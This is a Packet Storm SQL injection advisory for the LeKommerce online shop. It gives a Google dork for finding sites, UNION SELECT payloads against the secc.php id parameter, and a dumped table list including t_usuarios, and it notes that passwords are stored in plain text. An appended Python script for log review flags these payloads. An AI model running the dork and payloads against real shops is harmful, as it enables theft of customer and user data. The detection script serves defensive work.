LeKommerce Online Shop SQL Injection

2012-03-07T00:00:00
ID PACKETSTORM:110532
Type packetstorm
Reporter Mazt0r
Modified 2012-03-07T00:00:00

Description

                                        
`# Author: Mazt0r  
# Exploit Title: Online Shop SQLI LeKommerce  
# Date: 04 MARCH 2012  
# software: LeKommerce  
# link: http://www.lekommerce.com/  
# Version: "All versions"  
# Category: Commerce online  
# Tested on: Linux  
D0rk: inurl:secc.php?id=  
=====================================  
Exploit :  
======================  
http://localhost/path/secc.php?id={sqli}  
======================  
Example:  
======================  
http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7--  
http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7+from+information_schema.tables--  
======================  
dbs:  
======================  
+--------------------------------+  
| t_clientes |  
| t_colores |  
| t_colores_idiomas |  
| t_configuracionglobal |  
| t_emailing |  
| t_emailingcliente |  
| t_facturascompra |  
| t_facturasventa |  
| t_familias |  
| t_familias_idiomas |  
| t_formaspago |  
| t_idiomas |  
| t_incidencias |  
| t_iva |  
| t_marcas |  
| t_menusuperior |  
| t_noticias |  
| t_productos |  
| t_productos_idiomas |  
| t_proveedores |  
| t_provincias |  
| t_rel_productos_tallas_colores |  
| t_rel_tallas_colores |  
| t_seccionesproductos |  
| t_seccionesproductos_idiomas |  
| t_series |  
| t_subfamilias |  
| t_subfamilias_idiomas |  
| t_tallas |  
| t_tallas_idiomas |  
| t_tiposperfiles |  
| t_traducciones |  
| t_usuarios |  
+--------------------------------+  
PASSWD: TEXT PLAIN? <<<--- SECURE? EPIC!  
--------------Gr33tZ------------------  
DDLR - CYBERLOCOS - Thelatin - K4rl -Cpum4 - N350k - hkm - nitr0us - Xianur0 - All Friends!  
----------------------------------  
Blog: maztor.blogspot.com  
Twitter: @Mazt0r  
----------------------------------  
  
`
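
A log-review check for the request pattern in the advisory's examples, added here as an illustration and not part of the original advisory or of LeKommerce. It assumes that legitimate `id` values for `secc.php` are plain non-negative integers and that the web server writes common/combined-format access logs; the sample log lines, function names and the `/shop/` path are constructed for the example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (common log format); not taken from the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Mar/2012:10:00:01 +0000] "GET /shop/secc.php?id=12 HTTP/1.1" 200 5120
203.0.113.9 - - [07/Mar/2012:10:00:07 +0000] "GET /shop/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7-- HTTP/1.1" 200 4980
203.0.113.9 - - [07/Mar/2012:10:00:09 +0000] "GET /shop/secc.php?id=-1%2520union%2520select%25201,2+from+information_schema.tables-- HTTP/1.1" 200 7733
198.51.100.4 - - [07/Mar/2012:10:01:30 +0000] "GET /shop/index.php?id=abc HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
SQL_HINTS = re.compile(r"\b(union|select|information_schema)\b", re.I)


def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded payloads (%2520) are normalised."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(log_text, script="secc.php", param="id"):
    """Return (client, status, reason, decoded_value) for non-integer id values."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, _ts, _method, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        for pair in url.query.split("&"):
            name, _, raw = pair.partition("=")
            if name != param:
                continue
            value = fully_decode(raw)
            if re.fullmatch(r"\d+", value):  # assumption: valid ids are digits only
                continue
            reason = "sql-keywords" if SQL_HINTS.search(value) else "non-numeric"
            findings.append((client, status, reason, value))
    return findings


if __name__ == "__main__":
    for finding in suspicious_requests(SAMPLE_LOG):
        print(finding)
```

A finding with status 200 only shows that the request was served, so follow up by comparing response sizes and checking the database for access to `information_schema` or `t_usuarios`.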